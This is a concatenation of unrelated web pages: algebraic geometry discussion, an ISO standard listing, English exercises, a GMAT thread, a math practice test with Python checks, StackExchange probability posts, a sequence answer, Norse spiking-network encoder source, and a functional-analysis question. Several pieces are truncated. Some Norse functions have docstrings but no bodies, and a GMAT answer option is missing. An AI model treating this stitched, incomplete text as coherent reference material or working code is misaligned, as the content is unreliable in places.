Consider the case of blowing up two points when $X$ is abelian. So we have two points on $X$ one of which we can assume is $0$ and the other we'll call $x$. An automorphism of $X$ that fixes both of these points will be an automorphism of $X$ as abelian variety that fixes pointwise the closed subgroup $A$ generated by $x$. The group fixing $x$ will then have finite index in the group fixing $A$ pointwise. For any abelian subvariety $A$ of $X$, the subgroup of $\mathrm{Aut}(X)$ fixing all the points of $A$ is an arithmetic subgroup (in a not necessarily semi-simple group) and in particular is finitely presented.
The same argument works for abelian varieties of any dimension. There one of course also has the option of blowing up positive dimensional varieties, assume $S$ is a smooth closed subvariety. This time the automorphism group is the subgroup of automorphisms $X$ that fixes $S$. We thus get an induced action on $S$ and the kernel of that action has the same structure as before. Unless I am mistaken, the automorphisms of $S$ that extend to $X$ are of finite index in $\mathrm{Aut}(S)$ (look at $\mathrm{Alb}(S) \rightarrow X$ and split it up to isogeny). Hence the finite generation etc for the blowing up is reduced to finite generation for $S$ (and conversely for $X$ replaced by $\mathrm{Alb}(S)$).
Consider now the case of $X$ still minimal but non-abelian or hyper-elliptic and look at blowing up of one point $x$. For a general point of $X$ (in the sense of being outside a countable number of proper subvarieties) the automorphism group is trivial and hence finitely generated. The situation for arbitrary $x$ seems unclear but one thread of the discussion started concerning itself with whether for a general $X$ there is a characterisation (up to commensurability) of $\mathrm{Aut}(X)$ similar to the minimal case: Look at all automorphisms of the integral cohomology of $X$ that preserves multiplicative structure, Hodge structure, Chern classes (of the tangent bundle) and effective cones (spanned by effective cycles). Is the image of the automorphism group of $X$ of finite index in this group? I think the answer is no (and I hope that what I present here is a proof). For that we need to recall some facts on Seshadri constants (Lazarsfeld: Positivity in Algebraic Geometry, I is my reference). Given a point $x$ the Seshadri constants $\epsilon(L;x)$ for $L$ nef (but also for $L$ restricted to be ample) determine (and are determined by) the nef cone of the blowing up at $x$; $L-rE$ is nef precisely when $0\leq r\leq \epsilon(L;x)$. Switching tack, there is a subset $U$ of $X$ which is the intersection of a countable number of open non-empty subsets of $X$ such that $\epsilon(L;x)$ is constant on $U$ for all ample $L$. Indeed, $\epsilon(L;x)$ can be expressed (loc. cit.: 5.1.17) in terms of whether or not $kL$ separates $s$-jets at $x$ and for fixed $k$ and $s$ the separation is true on an open subset.
The conclusion is that there is a $U$ which is the intersection of a countable number of non-empty open subsets for which the nef cone of the blowing up of $X$ at $x$ is independent of $x$ when one expresses it in the decomposition $\mathrm{NS}(X)\bigoplus\mathrm Z E$. If we assume now that $K_X$ is numerically trivial we have that the first Chern class of the tangent bundle of the blowup of $X$ at some $x$ equals $E$ (up to torsion) and hence the group above will preserve the decomposition $\mathrm{NS}(X)\bigoplus\mathrm Z E$ and fix $E$, and so comes from an automorphism of $\mathrm{NS}(X)$. The only further condition we put on it is that it preserve the nef cone, but for $x\in U$ this cone is independent of $x$. As we can further arrange it so that $x\in U \implies \varphi(x)\in U$ (as $\mathrm{Aut}(X)$ is countable) we get that all elements of $\mathrm{Aut}(X)$ give structure-preserving automorphisms of the cohomology of the blowup of $X$ at $x$. However, as observed before, at the price of shrinking $U$ we can assume that the automorphism group of the blowing up is trivial. Hence, if we let $X$ be for instance a K3-surface with infinite automorphism group we get an example.
https://standards.globalspec.com/std/9887098/iso-2005
# ISO 2005
## Rubber latex, natural, concentrate - Determination of sludge content
Status: Active, Most Current
Organization: ISO | Publication Date: 15 December 2014 | Page Count: 10 | ICS Code: 83.040.10 (Latex and raw rubber)
##### scope:
This International Standard specifies a method for the determination of the sludge content of natural rubber latex concentrate.
The method is not necessarily suitable for latices from natural sources other than Hevea brasiliensis.
It is not suitable for compounded latex or vulcanized latex.
### Document History
ISO 2005
December 15, 2014
Rubber latex, natural, concentrate - Determination of sludge content
This International Standard specifies a method for the determination of the sludge content of natural rubber latex concentrate. The method is not necessarily suitable for latices from natural...
June 1, 1992
Rubber Latex, Natural, Concentrate - Determination of Sludge Content
January 1, 1992
Rubber Latex, Natural, Concentrate - Determination of Sludge Content
http://viet-anh.vn/194/bai-tap-viet-lai-cau/ | # Sentence Rewriting Exercises (Bài tập viết lại câu)
1. Your house is bigger than mine.
My house . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
2. He did his homework, then he went to bed.
After . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3. Jane doesn’t speak English as well as Peter.
Peter. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
4. Da Lat is one of the famous landscapes in Vietnam. I spent my holiday there.
I spent. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
5. The manager asked me to come to his office
The manager said. . . . . . . . . . . . . . . . . . . . . . . . . .
6. He asked me where he could find her in that town.
He said . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7. She asked me not to be late.
She said to me . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
8. The train couldn’t run because of the snow.
The snow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
9. Nam laughed a lot when I told him the joke.
The joke. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
10. The police continued to watch the house.
The police carried. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
11. Mr. John gave an interesting speech.
Mr. John spoke. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
12. The sight was right in front of him but he didn’t notice it.
Although . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
13. The woman was terribly upset. Her dog was run over.
The woman whose. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
14. Let’s go abroad for our holiday this year.
Why. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
15. I fell asleep as the film was so boring.
I fell asleep because of. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
16. My students are very good at Mathematics.
My students study. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17. This is the most modern building in this area.
No building. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
I had these. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
19. John drives more carefully than his brother.
John’s brother doesn’t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
20. They were such difficult questions that we couldn’t answer them.
The questions were so. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
21. Lan didn’t go to the school last Monday because she was sick.
Because of . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
22. Why don’t you bring your brother to the party?
I suggest. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Source: Diendan.hocmai.vn
https://gmatclub.com/forum/child-development-specialists-have-observed-that-adolescents-131540.html | Check GMAT Club Decision Tracker for the Latest School Decision Releases https://gmatclub.com/AppTrack
It is currently 23 May 2017, 20:28
### GMAT Club Daily Prep
#### Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email.
Customized
for You
we will pick new questions that match your level based on your Timer History
Track
every week, we’ll send you an estimated GMAT score based on your performance
Practice
Pays
we will pick new questions that match your level based on your Timer History
# Events & Promotions
###### Events & Promotions in June
Open Detailed Calendar
# Child development specialists have observed that adolescents
Posted 28 Apr 2012 by a Verbal Forum Moderator (joined 23 Oct 2011).
Question Stats: 82% (01:56) correct, 18% (01:04) wrong, based on 278 sessions. Difficulty: 5% (low).
Child development specialists have observed that adolescents who receive large weekly allowances tend to spend money on items considered frivolous by their parents, whereas adolescents who receive small weekly allowances do not. Thus, in order to ensure that their children do not spend money on frivolous items, parents should not give their children large weekly allowances. Which of the following pieces of information would be most useful in evaluating the validity of the conclusion above?

b) Any differences among parents in the standard used to judge an item as frivolous
c) The educational background of the child development specialists who made this observation
d) The difference between the average annual income of families in which the parents give their children large weekly allowances and that of families in which the parents give their children small weekly allowances
Reply, 16 May 2012:
It is B since if parents use the same standard, the argument will hold true.
Reply, 18 May 2012:
Conclusion:
Thus, in order to ensure that their children do not spend money on frivolous items, parents should not give their children large weekly allowances.
What would be most useful in evaluating the validity of the conclusion above is to know what is considered a frivolous item. An item could be frivolous for one parent but not for another. In that case the conclusion may not hold true, because a "large" amount itself may vary from $1 to $1000 and more.
Reply, 24 Jul 2016:
B for sure
Reply, 17 Apr 2017:
frivolous: not having any serious purpose or value.
Adolescents--->large weekly allowances-->spend on items not having any serious purpose or value.
Adolescents--->small weekly allowances-->do not spend on items not having serious purpose or value.
The conclusion of the passage is that parents can ensure that their children will not spend money on frivolous items by limiting their children's allowances. This claim is based on the observed difference between the spending habits of children who receive large allowances and those of children who receive small allowances. The argument assumes that the high dollar amount of the allowance – as opposed to some other unobserved factor – is directly linked to the fact that children spend the money on items their parents consider frivolous. Information that provides data about any other factor that might be the cause of the children's spending behavior would help to evaluate the validity of the conclusion.
(B) CORRECT. One alternative to the conclusion of the passage is that the standard used to judge an item as frivolous was much lower for parents who gave their children large weekly allowances than for parents who gave their children small weekly allowances. If for example, the former group of parents considered all movie tickets to be frivolous, while the latter did not, then this fact (and not the difference in allowance money) might explain the difference observed by the child development specialists. Thus, information about any differences among parents in the standard used to judge an item as frivolous would be extremely relevant in evaluating the validity of the conclusion of the passage.
(C) The background of the child development specialists who made the observation has no bearing on the conclusion. The conclusion is based on the observation, not on the credentials of those making the observation.
(D) Family income differences have no clear relevance to the link posited between high allowances and spending on frivolous items.
— Anaira Mitch
http://imomath.com/index.php?options=322&lmm=0 | # General Practice Test
1. (13 p.) A right circular cylinder has a diameter 12. Two planes cut the cylinder, the first perpendicular to the axis and the second at a $$45^\circ$$ angle to the first, so that the line of intersection of the two planes touches the cylinder at a single point. The two cuts remove a wedge from the cylinder. If $$V$$ is the volume of the wedge, calculate $$V/\pi$$.
2. (3 p.) $$n$$ is an integer between 100 and 999 inclusive, and $$n^{\prime}$$ is the integer formed by reversing the digits of $$n$$. How many possible values are there for $$|n-n^{\prime}|$$?
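Problem 2 is small enough to check by brute force; the sketch below simply enumerates every three-digit $$n$$ (spoiler: it confirms the count, so skip it if you want to solve the problem yourself):

```python
# Enumerate |n - reverse(n)| for all three-digit n.
# Writing n = 100a + 10b + c, its reversal is 100c + 10b + a, so the
# difference is 99*(a - c); only |a - c| in {0, ..., 9} matters.
values = {abs(n - int(str(n)[::-1])) for n in range(100, 1000)}
print(len(values))  # number of distinct values of |n - n'|
```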
3. (27 p.) If the corresponding terms of two arithmetic progressions are multiplied we get the sequence 1440, 1716, 1848, ... . Find the eighth term of this sequence.
4. (37 p.) The right circular cone has height 4 and its base radius is 3. Its surface is painted black. The cone is cut into two parts by a plane parallel to the base, so that the volume of the top part (the small cone) divided by the volume of the bottom part equals $$k$$ and the painted area of the top part divided by the painted area of the bottom part also equals $$k$$. If $$k$$ is of the form $$p/q$$ for two relatively prime numbers $$p$$ and $$q$$, calculate $$p+q$$.
5. (17 p.) Two students Alice and Bob participated in a two-day math contest. At the end both had attempted questions worth 500 points. Alice scored 160 out of 300 attempted on the first day and 140 out of 200 attempted on the second day, so her two-day success ratio was 300/500 = 3/5. Bob’s scores are different from Alice’s (but with the same two-day total). Bob had a positive integer score on each day. However, for each day Bob’s success ratio was less than Alice’s. Assume that $$p/q$$ ($$p$$ and $$q$$ are relatively prime integers) is the largest possible two-day success ratio that Bob could have achieved. Calculate $$p+q$$.
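Problem 5 is also brute-forceable. Alice's daily ratios are 160/300 = 8/15 and 140/200 = 7/10; the sketch below (the split variable `q1` for Bob's day-one attempted points is my own naming) searches all splits and, for each, takes the largest integer scores strictly below Alice's daily ratios. Spoiler: it confirms the known maximum, so skip it if solving the problem yourself:

```python
from fractions import Fraction

best = Fraction(0)
for q1 in range(2, 499):        # points Bob attempted on day 1
    q2 = 500 - q1               # points Bob attempted on day 2
    p1 = (8 * q1 - 1) // 15     # largest integer score with p1/q1 < 8/15
    p2 = (7 * q2 - 1) // 10     # largest integer score with p2/q2 < 7/10
    if p1 >= 1 and p2 >= 1:     # positive integer score on each day
        best = max(best, Fraction(p1 + p2, 500))

print(best, best.numerator + best.denominator)
```

Interestingly, Bob's best two-day ratio exceeds Alice's 3/5 even though each of his daily ratios is lower — an instance of Simpson's paradox.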
https://math.stackexchange.com/questions/1473250/difference-between-two-u0-1 | # Difference between two $U(0,1)$
Problem: Person $X$ and person $Y$ are having a meeting. Person $X$ arrives somewhere between $9$ and $10$, with arrival time uniformly distributed; likewise person $Y$ arrives somewhere between $9$ and $10$, with arrival time uniformly distributed. What is the distribution of the waiting time of the person who arrives first? The arrival times of $X$ and $Y$ are independent.
Attempt 1: Let $X \sim U(0,1)$ and $Y \sim U(0,1)$, with $X$ and $Y$ independent. Find the distribution of $T = \text{abs}(X - Y)$. But $\text{abs}()$ is hard, so first let $V=X-Y$. We use the convolution formula to find that the PDF of $V$ is a triangle with corners $(-1,0), (1,0), (0,1)$. The PDF of $-V$ is the same. Since $V$ and $-V$ have the same PDF, $T$ has this PDF also (simply because $\text{abs}(a-b)=\max[ a-b, -(a-b) ]$).
Attempt 2: Let $X \sim U(0,1)$ and $Y \sim U(0,1)$, with $X$ and $Y$ independent. Find the distribution of $T = T_2 - T_1 = \max(X,Y) - \min(X,Y)$. We see that the CDFs are $F_{T_2}(t) = t^2$ and $F_{T_1}(t) = 2t - t^2$, but then I cannot go further.
If $X,Y$ are independent and uniformly distributed over $[0,1]$ then the PDF of $Z=X-Y$ is supported on $[-1,1]$ and given by $f_Z(u)=1-|u|$. It follows that the PDF of $W=|Z|$ is supported on $[0,1]$ and given by $f_W(u) = 2-2u$.
• @jack-daurizio I see that the $f_Z(u)$ follows from math.stackexchange.com/questions/344844/… – jacob Oct 10 '15 at 13:53
• @jacob: if the PDF of $X$ is given by $f_X(u)$, the PDF of $|X|$ is given by $f_X(u)+f_X(-u)$, isn't it trivial? – Jack D'Aurizio Oct 10 '15 at 13:54
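A quick Monte Carlo check of the accepted answer's density $f_W(u)=2-2u$, equivalently the CDF $F_W(t)=2t-t^2$ (a sketch, purely illustrative):

```python
import random

random.seed(0)
n = 200_000
# W = |X - Y| for independent uniforms on [0, 1]
samples = [abs(random.random() - random.random()) for _ in range(n)]

# the claimed CDF is F_W(t) = 2t - t^2; check it at t = 0.5
empirical = sum(s <= 0.5 for s in samples) / n
exact = 2 * 0.5 - 0.5 ** 2          # = 0.75
```

The empirical proportion lands within Monte Carlo error of $0.75$, consistent with $f_W(u)=2-2u$.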
https://stats.stackexchange.com/questions/240951/inference-using-gibbs-sampling | # Inference using Gibbs sampling
Suppose there is a one-dimensional normal distribution $\mathcal{N}(\mu, \sigma)$ for which we want to infer the joint distribution of the parameters using Gibbs sampling. Let $D$ be the data, consisting of $n$ datapoints $d_1, ..., d_n$. Assume a broad Gamma prior on the precision parameter $\beta=\frac{1}{\sigma^2}$.
So, now I need to find an expression for $P(\sigma | D, \mu)$. Note that $P(\sigma | D, \mu) \propto P(D| \mu, \sigma) P(\sigma)$.
I tried the following:
\begin{align} P(\sigma | D, \mu) &\propto P(D| \mu, \sigma) P(\sigma) \\ &\propto \Gamma(\sigma | \alpha, \beta) \prod\limits_{i=1}^n \mathcal{N}(d_i| \mu, \sigma) \end{align}
In the next step, I throw away the $(\sqrt{2 \pi})^n$ since that is a constant.
\begin{align} \qquad\qquad\qquad\qquad\qquad\qquad &\propto_\sigma \Gamma(\sigma | \alpha, \beta) \sigma^{-n} \prod\limits_{i=1}^n \exp(-\frac{\sum\limits_{i=1}^n (d_i - \mu)^2}{2 \sigma^2}) \\ &\propto \Gamma(\sigma | \alpha, \beta) \sigma^{-n} \exp(-\frac{\sum\limits_{i=1}^n (d_i - \mu)^2}{2 \sigma^2}) \\ &\propto \beta^{\alpha} \sigma^{\alpha-1} \exp(-\beta \sigma) \sigma^{-n} \exp(-\frac{\sum\limits_{i=1}^n (d_i - \mu)^2}{2 \sigma^2}) \\ &\propto \sigma^{\alpha-1-n} \exp(-\frac{\sum\limits_{i=1}^n (d_i - \mu)^2 - 2 \beta \sigma^3}{2 \sigma^2}) \end{align}
And now? Is it supposed to be another Gamma distribution? What steps am I missing? I don't see it yet.
• Your prior on $\sigma$ or $\sigma^{-1}$ cannot involve $\sigma$ as a parameter. If you assume a $\text{G}(a,b)$ prior on $\sigma^{-2}$, the parameters $a$ and $b$ must be fixed. – Xi'an Oct 18 '16 at 18:39
• Thank you, I tried to change it, hopefully the partial answer is correct now. – www.data-blogger.com Oct 18 '16 at 18:47
• Please register &/or merge your accounts (you can find information on how to do this in the My Account section of our help center), then you will be able to edit & comment on your own question. – gung - Reinstate Monica Oct 18 '16 at 18:56
• The Gamma prior should be on $\sigma^{-2}$ to enjoy conjugacy. – Xi'an Oct 18 '16 at 19:39
In the section 'Table of conjugate distributions', in the 'Continuous distributions' table, look at 'Normal with known mean'. That is exactly what you need in this Gibbs sampling problem, since it gives you a solution to $P(\sigma | D, \mu)$.
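Concretely, with a $\text{Gamma}(a,b)$ prior (rate parameterization) on the precision $\beta=\sigma^{-2}$, conjugacy gives $\beta \mid D,\mu \sim \text{Gamma}\!\left(a + \tfrac{n}{2},\; b + \tfrac12\sum_i (d_i-\mu)^2\right)$. A minimal sketch of that single Gibbs step, with assumed hyperparameters $a=b=1$ and synthetic data:

```python
import random

random.seed(1)

# synthetic data from N(mu=0, sigma=2), i.e. true precision beta = 0.25
mu, sigma, n = 0.0, 2.0, 2000
data = [random.gauss(mu, sigma) for _ in range(n)]

a, b = 1.0, 1.0                          # broad Gamma(a, b) prior on beta (rate b)
ss = sum((d - mu) ** 2 for d in data)    # sum of squared deviations from mu

def sample_precision():
    """One Gibbs step: draw beta from its full conditional Gamma posterior.
    random.gammavariate takes (shape, scale), so scale = 1 / rate."""
    return random.gammavariate(a + n / 2, 1.0 / (b + ss / 2))

draws = [sample_precision() for _ in range(5000)]
posterior_mean = sum(draws) / len(draws)
```

With this much data the posterior mean of $\beta$ concentrates near the true precision $1/\sigma^2 = 0.25$, and matches the analytic Gamma mean $(a+n/2)/(b+\mathrm{ss}/2)$.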
https://socratic.org/questions/how-do-you-write-the-first-five-terms-of-the-geometric-sequence-a-1-2-r-x-4 | # How do you write the first five terms of the geometric sequence a_1=2, r=x/4?
Jun 6, 2017
$2 , \frac{x}{2} , {x}^{2} / 8 , {x}^{3} / 32 , {x}^{4} / 128$
#### Explanation:
multiply the previous term by the common ratio $r$
${a}_{1} = 2$
${a}_{2} = {a}_{1} \times \frac{x}{4} = 2 \times \frac{x}{4} = \frac{x}{2}$
${a}_{3} = \frac{x}{2} \times \frac{x}{4} = {x}^{2} / 8$
${a}_{4} = {x}^{2} / 8 \times \frac{x}{4} = {x}^{3} / 32$
${a}_{5} = {x}^{3} / 32 \times \frac{x}{4} = {x}^{4} / 128$
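The same five terms can be checked mechanically. A small sketch (our own helper, not from the answer) that represents each term as a pair (rational coefficient, power of $x$):

```python
from fractions import Fraction

def geometric_terms(a1, ratio_coeff, n):
    """First n terms of a geometric sequence with first term a1 and
    common ratio (ratio_coeff * x); the power of x is tracked as an
    integer exponent alongside the rational coefficient."""
    return [(a1 * ratio_coeff ** k, k) for k in range(n)]

# a_1 = 2, r = x/4: coefficients 2, 1/2, 1/8, 1/32, 1/128 on x^0 .. x^4
terms = geometric_terms(Fraction(2), Fraction(1, 4), 5)
```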
https://norse.github.io/norse/_modules/norse/torch/functional/encode.html | # Source code for norse.torch.functional.encode
"""
Stateless encoding functionality for Norse, offering different ways to convert numerical
inputs to the spiking domain. Note that some functions, like population_encode does not return spikes,
but rather numerical values that will have to be converted into spikes via, for instance, the poisson encoder.
"""
from typing import Callable, Union
import torch
from .lif import lif_current_encoder, LIFParameters
def constant_current_lif_encode(
input_current: torch.Tensor,
seq_length: int,
p: LIFParameters = LIFParameters(),
dt: float = 0.001,
) -> torch.Tensor:
"""
Encodes input currents as fixed (constant) voltage currents, and simulates the spikes that
occur during a number of timesteps/iterations (seq_length).
Example:
>>> data = torch.as_tensor([2, 4, 8, 16])
>>> seq_length = 2 # Simulate two iterations
>>> constant_current_lif_encode(data, seq_length)
# State in terms of membrane voltage
(tensor([[0.2000, 0.4000, 0.8000, 0.0000],
[0.3800, 0.7600, 0.0000, 0.0000]]),
# Spikes for each iteration
tensor([[0., 0., 0., 1.],
[0., 0., 1., 1.]]))
Parameters:
input_current (torch.Tensor): The input tensor, representing LIF current
seq_length (int): The number of iterations to simulate
p (LIFParameters): Initial neuron parameters.
dt (float): Time delta between simulation steps
Returns:
A tensor with an extra dimension of size seq_length containing spikes (1) or no spikes (0).
"""
v = torch.zeros(*input_current.shape, device=input_current.device)
z = torch.zeros(*input_current.shape, device=input_current.device)
spikes = torch.zeros(seq_length, *input_current.shape, device=input_current.device)
for ts in range(seq_length):
z, v = lif_current_encoder(input_current=input_current, voltage=v, p=p, dt=dt)
spikes[ts] = z
return spikes
def gaussian_rbf(tensor: torch.Tensor, sigma: float = 1):
"""
A `gaussian radial basis kernel <https://en.wikipedia.org/wiki/Radial_basis_function_kernel>`_
that calculates the radial basis given a distance value (distance between :math:`x` and a data
value :math:`x'`, or :math:`\\|\\mathbf{x} - \\mathbf{x'}\\|^2` below).
.. math::
K(\\mathbf{x}, \\mathbf{x'}) = \\exp\\left(- \\frac{\\|\\mathbf{x} - \\mathbf{x'}\\|^2}{2\\sigma^2}\\right)
Parameters:
tensor (torch.Tensor): The tensor containing distance values to convert to radial bases
sigma (float): The spread of the gaussian distribution. Defaults to 1.
"""
def euclidean_distance(x, y):
"""
Simple euclidean distance metric.
"""
return (x - y).pow(2)
def population_encode(
input_values: torch.Tensor,
out_features: int,
scale: Union[int, torch.Tensor] = None,
kernel: Callable[[torch.Tensor], torch.Tensor] = gaussian_rbf,
distance_function: Callable[
[torch.Tensor, torch.Tensor], torch.Tensor
] = euclidean_distance,
) -> torch.Tensor:
"""
Encodes a set of input values into population codes, such that each singular input value is represented by
a list of numbers (typically calculated by a radial basis kernel), whose length is equal to the out_features.
Population encoding can be visualised by imagining a number of neurons in a list, whose activity increases
if a number gets close to its "receptive field".
Gaussian curves representing different neuron "receptive fields". Image credit: Andrew K. Richardson_.
.. _Andrew K. Richardson: https://commons.wikimedia.org/wiki/File:PopulationCode.svg
Example:
>>> data = torch.as_tensor([0, 0.5, 1])
>>> out_features = 3
>>> pop_encoded = population_encode(data, out_features)
tensor([[1.0000, 0.8825, 0.6065],
[0.8825, 1.0000, 0.8825],
[0.6065, 0.8825, 1.0000]])
>>> spikes = poisson_encode(pop_encoded, 1).squeeze() # Convert to spikes
Parameters:
input_values (torch.Tensor): The input data as numerical values to be encoded to population codes
out_features (int): The number of output *per* input value
scale (torch.Tensor): The scaling factor for the kernels. Defaults to the maximum value of the input.
Can also be set for each individual sample.
kernel: A function that takes two inputs and returns a tensor. The two inputs represent the center value
(which changes for each index in the output tensor) and the actual data value to encode respectively.
Defaults to gaussian radial basis kernel function.
distance_function: A function that calculates the distance between two numbers. Defaults to euclidean.
Returns:
A tensor with an extra dimension of size seq_length containing population encoded values of the input stimulus.
Note: An extra step is required to convert the values to spikes, see above.
"""
size = (input_values.size(0), out_features) + input_values.size()[1:]
if not scale:
scale = input_values.max()
centres = torch.linspace(0, scale, out_features).expand(size)
x = input_values.unsqueeze(1).expand(size)
distances = distance_function(x, centres) * scale
return kernel(distances)
def poisson_encode(
input_values: torch.Tensor,
seq_length: int,
f_max: float = 100,
dt: float = 0.001,
) -> torch.Tensor:
"""
Encodes a tensor of input values, which are assumed to be in the
range [0,1] into a tensor of one dimension higher of binary values,
which represent input spikes.
See for example https://www.cns.nyu.edu/~david/handouts/poisson.pdf.
Parameters:
input_values (torch.Tensor): Input data tensor with values assumed to be in the interval [0,1].
sequence_length (int): Number of time steps in the resulting spike train.
f_max (float): Maximal frequency (in Hertz) which will be emitted.
dt (float): Integration time step (should coincide with the integration time step used in the model)
Returns:
A tensor with an extra dimension of size seq_length containing spikes (1) or no spikes (0).
"""
return (
torch.rand(seq_length, *input_values.shape, device=input_values.device).float()
< dt * f_max * input_values
).float()
def poisson_encode_step(
input_values: torch.Tensor,
f_max: float = 1000,
dt: float = 0.001,
) -> torch.Tensor:
"""
Encodes a tensor of input values, which are assumed to be in the
range [0,1] into a tensor of binary values,
which represent input spikes.
See for example https://www.cns.nyu.edu/~david/handouts/poisson.pdf.
Parameters:
input_values (torch.Tensor): Input data tensor with values assumed to be in the interval [0,1].
f_max (float): Maximal frequency (in Hertz) which will be emitted.
dt (float): Integration time step (should coincide with the integration time step used in the model)
Returns:
A tensor containing binary values in {0,1}.
"""
return (
torch.rand(*input_values.shape, device=input_values.device).float()
< dt * f_max * input_values
).float()
def signed_poisson_encode(
input_values: torch.Tensor, seq_length: int, f_max: float = 100, dt: float = 0.001
) -> torch.Tensor:
"""
Encodes a tensor of input values, which are assumed to be in the
range [-1,1] into a tensor of one dimension higher of binary values,
which represent input spikes.
Parameters:
input_values (torch.Tensor): Input data tensor with values assumed to be in the interval [-1,1].
sequence_length (int): Number of time steps in the resulting spike train.
f_max (float): Maximal frequency (in Hertz) which will be emitted.
dt (float): Integration time step (should coincide with the integration time step used in the model)
Returns:
A tensor with an extra dimension of size seq_length containing values in {-1,0,1}
"""
return (
torch.sign(input_values)
* (
torch.rand(seq_length, *input_values.shape).float()
< dt * f_max * torch.abs(input_values)
).float()
)
def signed_poisson_encode_step(
input_values: torch.Tensor, f_max: float = 1000, dt: float = 0.001
) -> torch.Tensor:
"""
Creates a poisson distributed signed spike vector, when
Parameters:
input_values (torch.Tensor): Input data tensor with values assumed to be in the interval [-1,1].
f_max (float): Maximal frequency (in Hertz) which will be emitted.
dt (float): Integration time step (should coincide with the integration time step used in the model)
Returns:
A tensor containing values in {-1,0,1}.
"""
return (
torch.sign(input_values)
* (
torch.rand(*input_values.shape, device=input_values.device).float()
< dt * f_max * torch.abs(input_values)
).float()
)
def spike_latency_lif_encode(
input_current: torch.Tensor,
seq_length: int,
p: LIFParameters = LIFParameters(),
dt=0.001,
) -> torch.Tensor:
"""Encodes an input value by the time the first spike occurs.
Similar to the ConstantCurrentLIFEncoder, but the LIF can be
thought to have an infinite refractory period.
Parameters:
input_current (torch.Tensor): Input current to encode (needs to be positive).
sequence_length (int): Number of time steps in the resulting spike train.
p (LIFParameters): Parameters of the LIF neuron model.
dt (float): Integration time step (should coincide with the integration time step used in the model)
"""
voltage = torch.zeros_like(input_current)
z = torch.zeros_like(input_current)
spikes = []
for _ in range(seq_length):
z, voltage = lif_current_encoder(
input_current=input_current, voltage=voltage, p=p, dt=dt
)
spikes.append(z)
return spike_latency_encode(torch.stack(spikes))
def spike_latency_encode(input_spikes: torch.Tensor) -> torch.Tensor:
"""
For all neurons, remove all but the first spike. This encoding basically measures the time it takes for a
neuron to spike *first*. Assuming that the inputs are constant, this makes sense in that strong inputs spikes
fast.
See R. Van Rullen & S. J. Thorpe (2001): `Rate Coding Versus Temporal Order Coding: What the Retinal Ganglion Cells Tell the Visual Cortex <https://doi.org/10.1162/08997660152002852>`_.
Spikes are identified by their unique position within each sequence.
Example:
>>> data = torch.as_tensor([[0, 1, 1], [1, 1, 1]])
>>> spike_latency_encode(data)
tensor([[0, 1, 1],
[1, 0, 0]])
Parameters:
input_spikes (torch.Tensor): A tensor of input spikes, assumed to be at least 2D (sequences, ...)
Returns:
A tensor where the first spike (1) is retained in the sequence
""" | 2021-10-21 20:26:46 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5373627543449402, "perplexity": 10999.023207618982}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323585441.99/warc/CC-MAIN-20211021195527-20211021225527-00376.warc.gz"} |
https://mathoverflow.net/questions/176320/pointwise-in-time-convergence-in-h-1-implies-pointwise-weak-convergence-i/176354 | Pointwise (in time) convergence in $H^{-1}$ implies pointwise weak convergence in $L^q$, why?
Let $u_n \to u$ in $C^0([0,T];H^{-1}(\Omega))$ and suppose $\lVert u_n \rVert_{L^\infty(0,T;L^\infty(\Omega))} \leq C$ for all $n$.
It follows that for almost all $t$, $u_n(t)$ is bounded in $L^\infty(\Omega)$, so we can extract a weak-* convergent subsequence and after a bit of work we can show that $$\text{for almost all } t, \qquad u_n(t) \rightharpoonup u(t) \text{ in } L^q(\Omega) \qquad \text{for all } q < \infty.$$
I want to show that this weak convergence holds for all $t$.
From personal correspondence, I have been told that
The key point is that one already has convergence in the larger space. So one already knows that pointwise, i.e. for all $t$, $u(t)$ converges in this larger space. But since it is also bounded in $L^\infty$, $u(t)$ [for almost all $t$ -- riem's note] will also converge weak-* up to a subsequence, and the limits are the same when identified as distributions. The same is true for any $L^q$, $q<\infty$.
